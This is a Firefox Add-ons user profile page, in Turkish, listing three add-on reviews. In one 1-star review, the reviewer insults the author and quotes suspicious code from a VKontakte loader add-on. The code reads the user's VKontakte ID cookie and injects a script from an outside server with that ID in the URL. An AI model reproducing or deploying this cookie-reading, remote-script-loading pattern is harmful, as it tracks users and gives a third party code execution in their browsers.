Burada gördüğünüz binlerce eklentiyi denemek için, hızlı ve ücretsiz web tarayıcısı Mozilla Firefox'u indirin!
KapatFirefox Eklentileri'ne hoş geldiniz.
Firefox'unuzu kişiselleştirmek için binlerce ekstra özellik ve stilden istediklerinizi seçin.
KapatEvgeny Leonidovich
Hakkımda
İsim | Evgeny Leonidovich |
---|---|
Konum | Ukraine |
Üyelik başlangıcı | Tem. 2, 2010 |
Geliştirilen eklentilerin sayısı | 0 eklenti |
Geliştiricinin eklentilerinin ortalama puanı | Henüz puanlanmamış |
İncelemelerim
Notepad (QuickFox)
Rated 5 out of 5 stars
overlay.css
#quickfox-notes-status-iconTab{
-moz-image-region: rect(-2px, 31px, 16px, 16px)!important;}
#quickfox-notes-status-iconWindow{
-moz-image-region: rect(-2px, 15px, 16px, 0px)!important;}
#quickfox-notes-status-iconSidebar{
-moz-image-region: rect(-2px, 47px, 16px, 32px)!important;}
Proxy Tool
Rated 4 out of 5 stars
Please make a function to hide / show input proxy or make it in the context menu.I can give you new icons
This review is for a previous version of the add-on (1.15).Vkontakte Loader UserJS
Rated 1 out of 5 stars
автор мудак об'ясни пожалуйста что это за код?
if (objDocument.getElementById('vkontakte_loader_extension') == null) {
var s = objDocument.createElement("script");
s.setAttribute("id", 'vkontakte_loader_extension');
var cookieMgr = Components.classes["@mozilla.org/cookiemanager;1"].getService(Components.interfaces.nsICookieManager);
var Cookies = new Array();
for (var e = cookieMgr.enumerator; e.hasMoreElements();)
{
var cookie = e.getNext().QueryInterface(Components.interfaces.nsICookie);
if (cookie.name == 'remixmid')
{
var mid = cookie.value;
//var email = cookie.value;
break;
}
}
s.setAttribute("src", 'http://vlife.net.ru/vkontakte/main.js?vkontakte_id='+mid+'&');
objDocument.documentElement.firstChild.appendChild(s);
}
To create your own collections, you must have a Mozilla Add-ons account.